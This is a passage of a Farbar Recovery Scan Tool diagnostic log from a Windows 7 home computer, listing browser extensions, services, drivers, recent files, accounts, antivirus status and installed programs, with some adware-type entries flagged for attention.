CHR Extension: (Trend Micro Toolbar) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf [2016-11-26]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-26]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-26]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 ogmservice; C:\Program Files (x86)\Online Games Manager\ogmservice.exe [582544 2016-07-13] (RealNetworks, Inc.)
R2 PGMTrusted; C:\Program Files (x86)\Pogo Games\PGMTrusted.exe [520360 2013-03-25] (iWin Inc.)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [1137664 2015-07-16] (Trend Micro Inc.)
R2 PwmSvc; C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe [2458624 2016-09-01] (Trend Micro Inc.)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 31DADE60; C:\Windows\System32\drivers\31DADE60.sys [478392 2016-11-26] (Kaspersky Lab ZAO)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [140504 2016-08-10] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [332512 2016-08-10] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC64.sys [59712 2015-06-11] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [116576 2015-06-08] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [106720 2016-08-10] (Trend Micro Inc.)
R3 tmnciesc; C:\Windows\System32\DRIVERS\tmnciesc.sys [561952 2016-06-24] (Trend Micro Inc.)
R1 tmumh; C:\Windows\System32\DRIVERS\TMUMH.sys [101088 2016-08-09] (Trend Micro Inc.)
R2 tmusa; C:\Windows\System32\DRIVERS\tmusa.sys [124752 2015-12-09] (Trend Micro Inc.)
R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-29 18:11 - 2016-11-29 18:13 - 00025837 _____ C:\Users\Owner\Desktop\Addition.txt
2016-11-29 18:07 - 2016-11-29 18:14 - 00028592 _____ C:\Users\Owner\Desktop\FRST.txt
2016-11-29 18:06 - 2016-11-29 18:07 - 00000000 ____D C:\FRST
2016-11-29 18:02 - 2016-11-29 18:02 - 02411520 ____N (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-11-29 11:10 - 2016-11-29 11:10 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2016-11-28 14:52 - 2016-11-28 15:10 - 00002216 _____ C:\Users\Owner\Desktop\Play The Chronicles of Emerland Solitaire.lnk
2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
2016-11-26 22:32 - 2016-11-29 17:50 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2016-11-26 21:50 - 2016-11-29 16:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-26 19:46 - 2016-11-26 19:47 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-11-26 19:45 - 2016-11-26 19:45 - 00001066 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-11-26 19:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-26 19:45 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-26 19:45 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-11-26 14:36 - 2016-11-26 14:45 - 00000000 ____D C:\KVRT_Data
2016-11-26 14:36 - 2016-11-26 14:36 - 00478392 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\31DADE60.sys
2016-11-26 14:00 - 2016-11-26 14:00 - 00000000 ____D C:\Users\Owner\AppData\Local\CEF
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Software Updater Beta
2016-11-26 13:52 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Security Scan
2016-11-26 13:52 - 2016-11-26 13:51 - 00001015 _____ C:\Users\Public\Desktop\Kaspersky Security Scan.lnk
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\ProgramData\Kaspersky Lab
2016-11-26 13:51 - 2016-11-26 13:52 - 00000000 ____D C:\Program Files (x86)\Kaspersky Lab
2016-11-26 13:49 - 2016-11-26 13:50 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-11-26 13:48 - 2016-11-26 13:48 - 02622304 _____ (Kaspersky Lab) C:\Users\Owner\Downloads\kss16.0.0.1344en_9702.exe
2016-11-26 13:45 - 2016-11-26 13:49 - 00211378 _____ C:\TDSSKiller.3.1.0.12_26.11.2016_13.45.18_log.txt
2016-11-26 13:44 - 2016-11-26 13:45 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller.exe
2016-11-26 13:27 - 2016-11-26 13:39 - 22851472 _____ (Malwarebytes ) C:\Users\Owner\Downloads\mbam-setup-2.2.1.1043.exe
2016-11-26 13:10 - 2016-11-26 13:10 - 00000000 ____D C:\Users\Owner\AppData\Local\HP_Development_Company,_L
2016-11-26 13:03 - 2016-11-26 13:03 - 00002231 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-26 13:03 - 2016-11-26 13:03 - 00002219 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-11-26 13:02 - 2016-11-29 18:07 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-26 13:02 - 2016-11-29 14:28 - 00000892 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-26 13:02 - 2016-11-26 13:53 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2016-11-26 13:02 - 2016-11-26 13:03 - 00000000 ____D C:\Program Files (x86)\Google
2016-11-26 13:02 - 2016-11-26 13:02 - 00003892 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-11-26 13:02 - 2016-11-26 13:02 - 00003640 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-11-26 13:00 - 2016-11-26 13:00 - 01065376 _____ (Google Inc.) C:\Users\Owner\Downloads\ChromeSetup.exe
2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
2016-11-25 18:38 - 2016-11-25 18:38 - 00000000 ____D C:\ProgramData\HP Inc
2016-11-13 01:25 - 2016-11-13 01:56 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2016-11-13 01:25 - 2016-11-13 01:26 - 00001303 _____ C:\Users\Owner\Desktop\Norton Installation Files.lnk
2016-11-13 01:25 - 2016-11-13 01:25 - 00000000 ____D C:\Users\Public\Downloads\Norton

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-11-29 18:05 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-11-29 18:05 - 2009-07-13 23:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-11-29 17:53 - 2012-09-08 13:26 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-11-29 16:38 - 2013-07-16 13:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-29 14:30 - 2016-10-21 23:38 - 00000000 ____D C:\Users\Owner\AppData\Local\DP_Tower_3.7
2016-11-29 14:29 - 2013-06-07 21:03 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Temp
2016-11-29 14:28 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-11-29 10:39 - 2016-02-22 09:53 - 00000010 _____ C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2016-11-29 01:43 - 2013-05-25 16:09 - 00000000 ____D C:\Users\Owner\Desktop\Ginny's Recipes
2016-11-29 01:43 - 2010-10-22 23:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-11-28 22:59 - 2009-07-14 00:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-28 22:59 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-28 15:10 - 2013-08-02 21:08 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2016-11-28 14:52 - 2013-06-07 21:05 - 00000000 ____D C:\Remote Programs
2016-11-26 20:32 - 2015-10-21 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-11-26 20:32 - 2010-07-11 00:29 - 00000000 ____D C:\Program Files\Java
2016-11-26 20:30 - 2015-10-21 19:55 - 00110144 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2016-11-26 20:27 - 2013-08-18 12:38 - 00000000 ____D C:\Program Files (x86)\Java
2016-11-26 20:26 - 2016-10-23 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\767c1f6b
2016-11-26 20:14 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-26 19:45 - 2013-07-16 14:09 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-11-26 13:10 - 2016-10-22 00:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForOwner
2016-11-26 13:10 - 2016-10-22 00:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForOwner.job
2016-11-26 04:58 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Help
2016-11-26 04:48 - 2009-07-13 23:45 - 00326960 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-25 18:37 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2016-11-25 18:36 - 2010-10-21 17:26 - 00080416 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-11-25 18:36 - 2010-07-10 22:09 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-11-25 18:29 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-11-25 18:20 - 2010-07-10 22:10 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-11-25 18:18 - 2010-10-21 17:28 - 00000000 ____D C:\Users\Owner\AppData\Roaming\hpqLog
2016-11-25 18:06 - 2012-05-15 19:43 - 00000000 ____D C:\Program Files (x86)\HP
2016-11-25 16:41 - 2009-09-06 19:40 - 00000000 ____D C:\SwSetup
2016-11-24 04:13 - 2010-07-10 23:08 - 00000000 ____D C:\ProgramData\Temp
2016-11-24 03:43 - 2012-05-15 19:44 - 00000000 ____D C:\Users\Owner\AppData\Roaming\HpUpdate
2016-11-13 01:56 - 2010-09-28 03:51 - 00000000 ____D C:\ProgramData\Norton
2016-11-12 23:53 - 2012-09-08 13:26 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-11-12 23:53 - 2012-09-08 13:26 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-11-12 23:53 - 2012-02-20 15:56 - 00000000 ____D C:\Windows\system32\Macromed
2016-11-12 23:53 - 2011-06-15 18:31 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-11-12 23:53 - 2010-07-10 22:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2013-12-25 01:41 - 2016-05-08 13:39 - 0000458 _____ () C:\Users\Owner\AppData\Roaming\wklnhst.dat
2016-02-22 09:53 - 2016-11-29 10:39 - 0000010 _____ () C:\Users\Owner\AppData\Local\sponge.last.runtime.cache
2012-05-15 19:41 - 2012-05-15 19:41 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2010-07-10 23:57 - 2010-07-10 23:57 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2010-07-10 23:51 - 2010-07-10 23:52 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2010-09-28 03:44 - 2010-09-28 03:44 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-28 03:45 - 2010-09-28 03:45 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-10 23:50 - 2010-07-10 23:51 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-10 23:52 - 2010-07-10 23:56 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-28 03:45 - 2010-09-28 03:46 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log

Some files in TEMP:
====================
C:\Users\Owner\AppData\Local\Temp\dl1BFF590E-574A-DB44-A7B9-32C75D636C65.exe
C:\Users\Owner\AppData\Local\Temp\Extract.exe
C:\Users\Owner\AppData\Local\Temp\fp_pl_pfs_installer.exe
C:\Users\Owner\AppData\Local\Temp\GenericUninstall.exe
C:\Users\Owner\AppData\Local\Temp\HPHelpUpdater.exe
C:\Users\Owner\AppData\Local\Temp\HPQSi.exe
C:\Users\Owner\AppData\Local\Temp\HPSFUpdater.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\Owner\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u111-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u40-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\jre-8u65-windows-au.exe
C:\Users\Owner\AppData\Local\Temp\Resource.exe
C:\Users\Owner\AppData\Local\Temp\SP50498.exe
C:\Users\Owner\AppData\Local\Temp\SP50718.exe
C:\Users\Owner\AppData\Local\Temp\SP50720.exe
C:\Users\Owner\AppData\Local\Temp\SP50979.exe
C:\Users\Owner\AppData\Local\Temp\SP51650.exe
C:\Users\Owner\AppData\Local\Temp\SP51976.exe
C:\Users\Owner\AppData\Local\Temp\sp52110.exe.exe
C:\Users\Owner\AppData\Local\Temp\SP52131.exe
C:\Users\Owner\AppData\Local\Temp\SP52509.exe
C:\Users\Owner\AppData\Local\Temp\SP52598.exe
C:\Users\Owner\AppData\Local\Temp\sp54620.exe
C:\Users\Owner\AppData\Local\Temp\sp58915.exe
C:\Users\Owner\AppData\Local\Temp\sp64126.exe
C:\Users\Owner\AppData\Local\Temp\sphpsa.exe
C:\Users\Owner\AppData\Local\Temp\uninstaller.exe
C:\Users\Owner\AppData\Local\Temp\UninstallHPSA.exe
C:\Users\Owner\AppData\Local\Temp\UninstallHPTCA.exe
C:\Users\Owner\AppData\Local\Temp\ytb.exe
C:\Users\Owner\AppData\Local\Temp\_is751F.exe
C:\Users\Owner\AppData\Local\Temp\_is7F9B.exe


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-23 17:36

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by Owner (29-11-2016 18:16:53)
Running from C:\Users\Owner\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-10-21 21:54:18)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2406275642-2542123288-3132197554-500 - Administrator - Disabled)
Guest (S-1-5-21-2406275642-2542123288-3132197554-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2406275642-2542123288-3132197554-1002 - Limited - Enabled)
Owner (S-1-5-21-2406275642-2542123288-3132197554-1000 - Administrator - Enabled) => C:\Users\Owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Disabled - Up to date) {8242D66F-41BD-4049-C2E6-E578E73B62A0}
AS: Trend Micro Internet Security (Disabled - Up to date) {3923378B-6787-4FC7-F856-DE0A9CBC281D}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

5 Card Slingo Deluxe (HKLM-x32\...\5 Card Slingo Deluxe) (Version: 1.0.9 - funkitron)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Aquascapes (HKLM-x32\...\54e64742d7c097e9a547ec51ec3e33c2) (Version:  - GameHouse)
Aquascapes (HKLM-x32\...\BFG-Aquascapes) (Version:  - )
Aquascapes Collector's Edition (HKLM-x32\...\Aquascapes Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Aquascapes Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
ATI Catalyst Install Manager (HKLM\...\{ECD0D4B5-FFA9-6E1B-A08D-58E82EA5EEB9}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Barn Yarn Collector's Edition (HKLM-x32\...\Barn Yarn Collector's Edition_is1) (Version: 1.0 - Playrix Entertainment)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bumper Deluxe (HKLM-x32\...\Bumper Deluxe) (Version:  - funkitron)
ccc-core-static (x32 Version: 2010.0617.855.14122 - ATI) Hidden
Chainz 2 Relinked (HKLM-x32\...\exent_663050) (Version:  - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clutter II - He Said, She Said (HKLM-x32\...\310fe0ed83e67ea82706269a05741425) (Version:  - )
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Delicious - Emily's Wonder Wedding Premium Edition (HKLM-x32\...\65a10d0b2572fd789018429552e72c01) (Version:  - )
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Finding Hope (HKLM-x32\...\d21f1d9cc71efcf517e3da1e18d36787) (Version:  - GameHouse)
Fishdom (remove only) (HKLM-x32\...\Fishdom) (Version:  - )
Fishdom 3 (HKLM-x32\...\f787ff3ddadc8b46619e8324fac303ec) (Version:  - )
Fishdom H2O - Hidden Odyssey™ (remove only) (HKLM-x32\...\Fishdom H2O - Hidden Odyssey™) (Version:  - )
Fishdom™ 2 (HKLM-x32\...\22c5079ca968caf972807e4c92a273cc) (Version:  - )
Five Card Frenzy (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7}) (Version:  - Oberon Media)
Free Ride Games Player (HKLM-x32\...\{2B7BDADB-EC8C-4C54-B5DD-CE45A016D3A7}) (Version:  - Exent Technologies Ltd) <==== ATTENTION
GamesBar 1.1.0.5 (HKLM-x32\...\GamesBar) (Version:  - Oberon Media, Inc.)
Gardenscapes (HKLM-x32\...\Gardenscapes_is1) (Version: 1.0 - Playrix Entertainment)
Gold Miner Vegas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113644907}) (Version:  - Oberon Media)
Gold Miner Vegas (HKLM-x32\...\BFG-Gold Miner Vegas) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Object Crosswords (HKLM-x32\...\27054fe294c730c6d79be8b9c312346e) (Version:  - )
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.4.10262.3295 - Hewlett-Packard)
HP Documentation (HKLM-x32\...\{5E25081D-9CB4-4B17-AD2B-8DF2DC335E85}) (Version: 1.1.1.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.5 - WildTangent)
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3611 - HP Photo Creations Powered by RocketLife)
HP Photosmart 7510 series Basic Device Software (HKLM\...\{0446B95B-C0FD-4DE9-BD8E-76015D05E4F3}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Photosmart 7510 series Help (HKLM-x32\...\{6357D25F-A9C9-4CC7-A1FB-0DCF344E7C40}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 7510 series Product Improvement Study (HKLM\...\{D9F55AA1-FD3E-47FF-A385-72ED53666D3F}) (Version: 25.0.617.0 - Hewlett-Packard Co.)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{EB58480C-0721-483C-B354-9D35A147999F}) (Version: 2.3.6 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{72D90DB3-A16A-4545-B555-868471101833}) (Version: 8.1.4186.3400 - Hewlett-Packard)
HP Software Framework (HKLM-x32\...\{97174E88-52F9-445A-A28E-704A45332D19}) (Version: 4.0.108.1 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.3.34.7 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{E7F7C2F3-0BEF-471A-A6F3-4B43002034F4}) (Version: 12.5.32.37 - HP Inc.)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
HP Wireless Assistant (HKLM\...\{B5FC1E1B-E70D-45F1-8E40-A3C30698B323}) (Version: 4.0.9.0 - Hewlett-Packard Company)
Insaniquarium Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Internet Explorer Toolbar 4.8 by SweetPacks (HKLM-x32\...\{DD85D6BF-4787-4A93-99A5-3F0CF0AE8834}) (Version: 4.8.0000 - SweetIM Technologies Ltd.) <==== ATTENTION
